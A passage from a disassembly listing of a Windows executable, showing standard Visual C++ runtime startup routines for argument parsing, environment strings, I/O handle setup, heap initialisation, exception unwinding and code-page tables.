cmp [ebp+arg_10], edi
jz short loc_40300D
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_40300D
mov eax, edx
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_40300D: ; CODE XREF: sub_402EF1+10D�j
; sub_402EF1+116�j
mov [ebp+arg_0], edi
loc_403010: ; CODE XREF: sub_402EF1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40301E: ; CODE XREF: sub_402EF1+106�j
shr ebx, 1
loc_403020: ; CODE XREF: sub_402EF1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403035
inc ebx
loc_403028: ; CODE XREF: sub_402EF1+142�j
test esi, esi
jz short loc_403030
mov byte ptr [esi], 5Ch
inc esi
loc_403030: ; CODE XREF: sub_402EF1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403028
loc_403035: ; CODE XREF: sub_402EF1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403085
cmp [ebp+arg_10], 0
jnz short loc_40304B
cmp dl, 20h
jz short loc_403085
cmp dl, 9
jz short loc_403085
loc_40304B: ; CODE XREF: sub_402EF1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40307F
test esi, esi
jz short loc_40306E
movzx ebx, dl
test byte_407221[ebx], 4
jz short loc_403067
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403067: ; CODE XREF: sub_402EF1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40307D
; ---------------------------------------------------------------------------
loc_40306E: ; CODE XREF: sub_402EF1+162�j
movzx edx, dl
test byte_407221[edx], 4
jz short loc_40307D
inc eax
inc dword ptr [ecx]
loc_40307D: ; CODE XREF: sub_402EF1+17B�j
; sub_402EF1+187�j
inc dword ptr [ecx]
loc_40307F: ; CODE XREF: sub_402EF1+15E�j
inc eax
jmp loc_402FDD
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_402EF1+148�j
; sub_402EF1+153�j ...
test esi, esi
jz short loc_40308D
and byte ptr [esi], 0
inc esi
loc_40308D: ; CODE XREF: sub_402EF1+196�j
inc dword ptr [ecx]
jmp loc_402FAB
; ---------------------------------------------------------------------------
loc_403094: ; CODE XREF: sub_402EF1+BD�j
; sub_402EF1+D5�j
test edi, edi
jz short loc_40309B
and dword ptr [edi], 0
loc_40309B: ; CODE XREF: sub_402EF1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402EF1 endp
; =============== S U B R O U T I N E =======================================
sub_4030A5 proc near ; CODE XREF: .text:004028BD�p
var_8 = dword ptr -8
cchWideChar = dword ptr -4
push ecx
push ecx
mov eax, dword_4070A0
push ebx
push ebp
mov ebp, GetEnvironmentStringsW
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4030F3
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4030D4
mov dword_4070A0, 1
jmp short loc_4030FC
; ---------------------------------------------------------------------------
loc_4030D4: ; CODE XREF: sub_4030A5+21�j
call GetEnvironmentStrings ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_4031CE
mov dword_4070A0, 2
jmp loc_403182
; ---------------------------------------------------------------------------
loc_4030F3: ; CODE XREF: sub_4030A5+19�j
cmp eax, 1
jnz loc_40317D
loc_4030FC: ; CODE XREF: sub_4030A5+2D�j
cmp esi, ebx
jnz short loc_40310C
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_4031CE
loc_40310C: ; CODE XREF: sub_4030A5+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403121
loc_403113: ; CODE XREF: sub_4030A5+73�j
; sub_4030A5+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
loc_403121: ; CODE XREF: sub_4030A5+6C�j
sub eax, esi
mov edi, WideCharToMultiByte
sar eax, 1
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
inc eax
push ebx ; cbMultiByte
push ebx ; lpMultiByteStr
push eax ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
mov [esp+38h+cchWideChar], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_403172
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403172
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebp ; cbMultiByte
push eax ; lpMultiByteStr
push [esp+28h+cchWideChar] ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40316E
push [esp+18h+var_8]
call sub_403C87
pop ecx
mov [esp+18h+var_8], ebx
loc_40316E: ; CODE XREF: sub_4030A5+B9�j
mov ebx, [esp+18h+var_8]
loc_403172: ; CODE XREF: sub_4030A5+99�j
; sub_4030A5+A8�j
push esi ; LPWCH
call FreeEnvironmentStringsW ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_40317D: ; CODE XREF: sub_4030A5+51�j
cmp eax, 2
jnz short loc_4031CE
loc_403182: ; CODE XREF: sub_4030A5+49�j
cmp edi, ebx
jnz short loc_403192
call GetEnvironmentStrings ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_4031CE
loc_403192: ; CODE XREF: sub_4030A5+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_4031A2
loc_403198: ; CODE XREF: sub_4030A5+F6�j
; sub_4030A5+FB�j
inc eax
cmp [eax], bl
jnz short loc_403198
inc eax
cmp [eax], bl
jnz short loc_403198
loc_4031A2: ; CODE XREF: sub_4030A5+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4031B8
xor esi, esi
jmp short loc_4031C3
; ---------------------------------------------------------------------------
loc_4031B8: ; CODE XREF: sub_4030A5+10D�j
push ebp
push edi
push esi
call sub_402290
add esp, 0Ch
loc_4031C3: ; CODE XREF: sub_4030A5+111�j
push edi ; LPCH
call FreeEnvironmentStringsA ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_4031CE: ; CODE XREF: sub_4030A5+39�j
; sub_4030A5+61�j ...
xor eax, eax
loc_4031D0: ; CODE XREF: sub_4030A5+D6�j
; sub_4030A5+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4030A5 endp
; =============== S U B R O U T I N E =======================================
sub_4031D7 proc near ; CODE XREF: .text:004028AD�p
StartupInfo = _STARTUPINFOA ptr -44h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403CB6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4031F7
push 1Bh ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_4031F7: ; CODE XREF: sub_4031D7+16�j
mov dword_407340, esi
mov hResData, 20h
lea eax, [esi+100h]
loc_40320D: ; CODE XREF: sub_4031D7+52�j
cmp esi, eax
jnb short loc_40322B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_407340
add esi, 8
add eax, 100h
jmp short loc_40320D
; ---------------------------------------------------------------------------
loc_40322B: ; CODE XREF: sub_4031D7+38�j
lea eax, [esp+54h+StartupInfo]
push eax ; lpStartupInfo
call GetStartupInfoA ; GetStartupInfoA
cmp [esp+54h+StartupInfo.cbReserved2], 0
jz loc_403307
mov eax, [esp+54h+StartupInfo.lpReserved2]
test eax, eax
jz loc_403307
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403261
mov esi, eax
loc_403261: ; CODE XREF: sub_4031D7+86�j
cmp hResData, esi
jge short loc_4032BB
mov edi, offset dword_407344
loc_40326E: ; CODE XREF: sub_4031D7+DA�j
push 100h
call sub_403CB6
test eax, eax
pop ecx
jz short loc_4032B5
add hResData, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40328C: ; CODE XREF: sub_4031D7+CF�j
cmp eax, ecx
jnb short loc_4032A8
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40328C
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_4031D7+B7�j
add edi, 4
cmp hResData, esi
jl short loc_40326E
jmp short loc_4032BB
; ---------------------------------------------------------------------------
loc_4032B5: ; CODE XREF: sub_4031D7+A4�j
mov esi, hResData
loc_4032BB: ; CODE XREF: sub_4031D7+90�j
; sub_4031D7+DC�j
xor edi, edi
test esi, esi
jle short loc_403307
loc_4032C1: ; CODE XREF: sub_4031D7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4032FE
mov cl, [ebp+0]
test cl, 1
jz short loc_4032FE
test cl, 8
jnz short loc_4032E0
push eax ; hFile
call GetFileType ; GetFileType
test eax, eax
jz short loc_4032FE
loc_4032E0: ; CODE XREF: sub_4031D7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_407340[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4032FE: ; CODE XREF: sub_4031D7+EF�j
; sub_4031D7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4032C1
loc_403307: ; CODE XREF: sub_4031D7+65�j
; sub_4031D7+71�j ...
xor ebx, ebx
loc_403309: ; CODE XREF: sub_4031D7+195�j
mov eax, dword_407340
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403364
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403324
push 0FFFFFFF6h
pop eax
jmp short loc_40332E
; ---------------------------------------------------------------------------
loc_403324: ; CODE XREF: sub_4031D7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40332E: ; CODE XREF: sub_4031D7+14B�j
push eax ; nStdHandle
call GetStdHandle ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403353
push edi ; hFile
call GetFileType ; GetFileType
test eax, eax
jz short loc_403353
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_403359
loc_403353: ; CODE XREF: sub_4031D7+163�j
; sub_4031D7+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403359: ; CODE XREF: sub_4031D7+17A�j
cmp eax, 3
jnz short loc_403368
or byte ptr [esi+4], 8
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403364: ; CODE XREF: sub_4031D7+13E�j
or byte ptr [esi+4], 80h
loc_403368: ; CODE XREF: sub_4031D7+180�j
; sub_4031D7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_403309
push hResData ; hResData
call LockResource ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4031D7 endp
; =============== S U B R O U T I N E =======================================
sub_403382 proc near ; CODE XREF: .text:00402898�p
arg_0 = dword ptr 4
xor eax, eax
push 0 ; dwMaximumSize
cmp [esp+4+arg_0], eax
push 1000h ; dwInitialSize
setz al
push eax ; flOptions
call HeapCreate ; HeapCreate
test eax, eax
mov hHeap, eax
jz short loc_4033B7
call sub_403D2A
test eax, eax
jnz short loc_4033BA
push hHeap ; hHeap
call HeapDestroy ; HeapDestroy
loc_4033B7: ; CODE XREF: sub_403382+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_403382+27�j
push 1
pop eax
retn
sub_403382 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033C0 proc near ; CODE XREF: sub_4034B8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4033D8
push [ebp+arg_0]
call RtlUnwind ; RtlUnwind
loc_4033D8: ; DATA XREF: sub_4033C0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4033C0 endp
; =============== S U B R O U T I N E =======================================
sub_4033E0 proc near ; DATA XREF: sub_403402+A�o
; .text:00403473�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_403401
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_403401: ; CODE XREF: sub_4033E0+10�j
retn
sub_4033E0 endp
; =============== S U B R O U T I N E =======================================
sub_403402 proc near ; CODE XREF: sub_4034B8+67�p
; sub_4034B8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4033E0
push large dword ptr fs:0
mov large fs:0, esp
loc_40341F: ; CODE XREF: sub_403402:loc_40345A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40345C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40345C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40345A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403496
call dword ptr [ebx+esi*4+8]
loc_40345A: ; CODE XREF: sub_403402+44�j
jmp short loc_40341F
; ---------------------------------------------------------------------------
loc_40345C: ; CODE XREF: sub_403402+2A�j
; sub_403402+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_403402 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4033E0
jnz short locret_40348C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40348C
mov eax, 1
locret_40348C: ; CODE XREF: .text:0040347A�j
; .text:00403485�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406D8C
jmp short loc_4034A0
; =============== S U B R O U T I N E =======================================
sub_403496 proc near ; CODE XREF: sub_403402+4F�p
; sub_4034B8+78�p
push ebx
push ecx
mov ebx, offset dword_406D8C
mov ecx, [ebp+8]
loc_4034A0: ; CODE XREF: .text:00403494�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403496 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B8 proc near ; DATA XREF: .text:00402848�o
; sub_40371C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403558
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4034EB: ; CODE XREF: sub_4034B8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_403551
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40353F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40353F
js short loc_40354A
mov edi, [ebx+8]
push ebx
call sub_4033C0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_403402
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403496
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40353F: ; CODE XREF: sub_4034B8+40�j
; sub_4034B8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4034EB
; ---------------------------------------------------------------------------
loc_40354A: ; CODE XREF: sub_4034B8+54�j
mov eax, 0
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403551: ; CODE XREF: sub_4034B8+36�j
mov eax, 1
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403558: ; CODE XREF: sub_4034B8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_403402
add esp, 8
pop ebp
mov eax, 1
loc_40356D: ; CODE XREF: sub_4034B8+97�j
; sub_4034B8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_403402
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403590 proc near ; CODE XREF: sub_402934+9�p
; sub_402959+9�p
mov eax, dword_406F48
cmp eax, 1
jz short loc_4035A7
test eax, eax
jnz short locret_4035C8
cmp dword_406AD4, 1
jnz short locret_4035C8
loc_4035A7: ; CODE XREF: sub_403590+8�j
push 0FCh ; NumberOfBytesWritten
call sub_4035C9
mov eax, dword_4070A4
pop ecx
test eax, eax
jz short loc_4035BD
call eax ; dword_4070A4
loc_4035BD: ; CODE XREF: sub_403590+29�j
push 0FFh ; NumberOfBytesWritten
call sub_4035C9
pop ecx
locret_4035C8: ; CODE XREF: sub_403590+C�j
; sub_403590+15�j
retn
sub_403590 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4035C9(DWORD NumberOfBytesWritten)
sub_4035C9 proc near ; CODE XREF: sub_402934+12�p
; sub_402959+12�p ...
Filename = byte ptr -1A4h
var_A0 = byte ptr -0A0h
NumberOfBytesWritten= dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+NumberOfBytesWritten]
xor ecx, ecx
mov eax, offset dword_406DA0
loc_4035DC: ; CODE XREF: sub_4035C9+20�j
cmp edx, [eax]
jz short loc_4035EB
add eax, 8
inc ecx
cmp eax, offset byte_406E30
jl short loc_4035DC
loc_4035EB: ; CODE XREF: sub_4035C9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_406DA0[esi]
jnz loc_403719
mov eax, dword_406F48
cmp eax, 1
jz loc_4036F3
test eax, eax
jnz short loc_40361C
cmp dword_406AD4, 1
jz loc_4036F3
loc_40361C: ; CODE XREF: sub_4035C9+44�j
cmp edx, 0FCh
jz loc_403719
lea eax, [ebp+Filename]
push 104h ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
test eax, eax
jnz short loc_403653
lea eax, [ebp+Filename]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402720
pop ecx
pop ecx
loc_403653: ; CODE XREF: sub_4035C9+75�j
lea eax, [ebp+Filename]
push edi
push eax
lea edi, [ebp+Filename]
call sub_402210
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403696
lea eax, [ebp+Filename]
push eax
call sub_402210
mov edi, eax
lea eax, [ebp+Filename]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_404600
add esp, 10h
loc_403696: ; CODE XREF: sub_4035C9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402720
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402730
lea eax, [ebp+var_A0]
push offset asc_4053E8 ; "\n\n"
push eax
call sub_402730
push off_406DA4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402730
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404573
add esp, 2Ch
pop edi
jmp short loc_403719
; ---------------------------------------------------------------------------
loc_4036F3: ; CODE XREF: sub_4035C9+3C�j
; sub_4035C9+4D�j
lea eax, [ebp+NumberOfBytesWritten]
lea esi, off_406DA4[esi]
push 0 ; lpOverlapped
push eax ; lpNumberOfBytesWritten
push dword ptr [esi]
call sub_402210
pop ecx
push eax ; nNumberOfBytesToWrite
push dword ptr [esi] ; lpBuffer
push 0FFFFFFF4h ; nStdHandle
call GetStdHandle ; GetStdHandle
push eax ; hFile
call WriteFile ; WriteFile
loc_403719: ; CODE XREF: sub_4035C9+2E�j
; sub_4035C9+59�j ...
pop esi
leave
retn
sub_4035C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40371C(DWORD dwInfoType, LPCSTR lpMultiByteStr, int cbMultiByte, LPWORD lpCharType, UINT CodePage, LCID Locale, int)
sub_40371C proc near ; CODE XREF: sub_402A4C+5E�p
; sub_403AE6+9A�p
var_24 = dword ptr -24h
cchWideChar = dword ptr -20h
CharType = word ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
dwInfoType = dword ptr 8
lpMultiByteStr = dword ptr 0Ch
cbMultiByte = dword ptr 10h
lpCharType = dword ptr 14h
CodePage = dword ptr 18h
Locale = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405428
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4070A8
xor ebx, ebx
cmp eax, ebx
jnz short loc_40378B
lea eax, [ebp+CharType]
push eax ; lpCharType
push 1
pop esi
push esi ; cchSrc
push offset SrcStr ; lpSrcStr
push esi ; dwInfoType
call GetStringTypeW ; GetStringTypeW
test eax, eax
jz short loc_403769
mov eax, esi
jmp short loc_403786
; ---------------------------------------------------------------------------
loc_403769: ; CODE XREF: sub_40371C+47�j
lea eax, [ebp+CharType]
push eax ; lpCharType
push esi ; cchSrc
push offset byte_406F38 ; lpSrcStr
push esi ; dwInfoType
push ebx ; Locale
call GetStringTypeA ; GetStringTypeA
test eax, eax
jz loc_403851
push 2
pop eax
loc_403786: ; CODE XREF: sub_40371C+4B�j
mov dword_4070A8, eax
loc_40378B: ; CODE XREF: sub_40371C+2F�j
cmp eax, 2
jnz short loc_4037B4
mov eax, [ebp+Locale]
cmp eax, ebx
jnz short loc_40379C
mov eax, dword_4070C4
loc_40379C: ; CODE XREF: sub_40371C+79�j
push [ebp+lpCharType] ; lpCharType
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
push eax ; Locale
call GetStringTypeA ; GetStringTypeA
jmp loc_403853
; ---------------------------------------------------------------------------
loc_4037B4: ; CODE XREF: sub_40371C+72�j
cmp eax, 1
jnz loc_403851
cmp [ebp+CodePage], ebx
jnz short loc_4037CA
mov eax, dword_4070D4
mov [ebp+CodePage], eax
loc_4037CA: ; CODE XREF: sub_40371C+A4�j
push ebx ; cchWideChar
push ebx ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+cchWideChar], eax
cmp eax, ebx
jz short loc_403851
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4021B0
add esp, 0Ch
jmp short loc_403820
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403820: ; CODE XREF: sub_40371C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403851
push [ebp+cchWideChar] ; cchWideChar
push esi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403851
push [ebp+lpCharType] ; lpCharType
push eax ; cchSrc
push esi ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
call GetStringTypeW ; GetStringTypeW
jmp short loc_403853
; ---------------------------------------------------------------------------
loc_403851: ; CODE XREF: sub_40371C+61�j
; sub_40371C+9B�j ...
xor eax, eax
loc_403853: ; CODE XREF: sub_40371C+93�j
; sub_40371C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40371C endp
; =============== S U B R O U T I N E =======================================
sub_403865 proc near ; CODE XREF: sub_402D47+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403876
add esp, 0Ch
retn
sub_403865 endp
; =============== S U B R O U T I N E =======================================
sub_403876 proc near ; CODE XREF: sub_403865+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_407221[eax], cl
jnz short loc_4038A3
cmp [esp+arg_4], 0
jz short loc_40389C
movzx eax, word_406AEA[eax*2]
and eax, [esp+arg_4]
jmp short loc_40389E
; ---------------------------------------------------------------------------
loc_40389C: ; CODE XREF: sub_403876+16�j
xor eax, eax
loc_40389E: ; CODE XREF: sub_403876+24�j
test eax, eax
jnz short loc_4038A3
retn
; ---------------------------------------------------------------------------
loc_4038A3: ; CODE XREF: sub_403876+F�j
; sub_403876+2A�j
push 1
pop eax
retn
sub_403876 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038A7 proc near ; CODE XREF: sub_403C6B+B�p
CPInfo = _cpinfo ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403A40
mov esi, eax
pop ecx
cmp esi, CodePage
mov [ebp+arg_0], esi
jz loc_403A34
xor ebx, ebx
cmp esi, ebx
jz loc_403A2A
xor edx, edx
mov eax, offset dword_406E38
loc_4038DB: ; CODE XREF: sub_4038A7+41�j
cmp [eax], esi
jz short loc_403951
add eax, 30h
inc edx
cmp eax, offset dword_406F28
jl short loc_4038DB
lea eax, [ebp+CPInfo]
push eax ; lpCPInfo
push esi ; CodePage
call GetCPInfo ; GetCPInfo
cmp eax, 1
jnz loc_403A22
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
cmp [ebp+CPInfo.MaxCharSize], 1
mov CodePage, esi
rep stosd
stosb
mov Locale, ebx
jbe loc_403A10
cmp [ebp+CPInfo.LeadByte], 0
jz loc_4039E6
lea ecx, [ebp+CPInfo.LeadByte+1]
loc_40392E: ; CODE XREF: sub_4038A7+139�j
mov dl, [ecx]
test dl, dl
jz loc_4039E6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_40393F: ; CODE XREF: sub_4038A7+A8�j
cmp eax, edx
ja loc_4039DA
or byte_407221[eax], 4
inc eax
jmp short loc_40393F
; ---------------------------------------------------------------------------
loc_403951: ; CODE XREF: sub_4038A7+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406E48[esi]
loc_40396D: ; CODE XREF: sub_4038A7+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_4039A0
loc_403974: ; CODE XREF: sub_4038A7+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_4039A0
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403999
mov edx, [ebp+var_4]
mov dl, byte_406E30[edx]
loc_40398E: ; CODE XREF: sub_4038A7+F0�j
or byte_407221[eax], dl
inc eax
cmp eax, edi
jbe short loc_40398E
loc_403999: ; CODE XREF: sub_4038A7+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403974
loc_4039A0: ; CODE XREF: sub_4038A7+CB�j
; sub_4038A7+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_40396D
mov eax, [ebp+arg_0]
mov dword_40711C, 1
push eax
mov CodePage, eax
call sub_403A8A
lea esi, dword_406E3C[esi]
mov edi, offset dword_407110
movsd
movsd
pop ecx
mov Locale, eax
movsd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_4039DA: ; CODE XREF: sub_4038A7+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_40392E
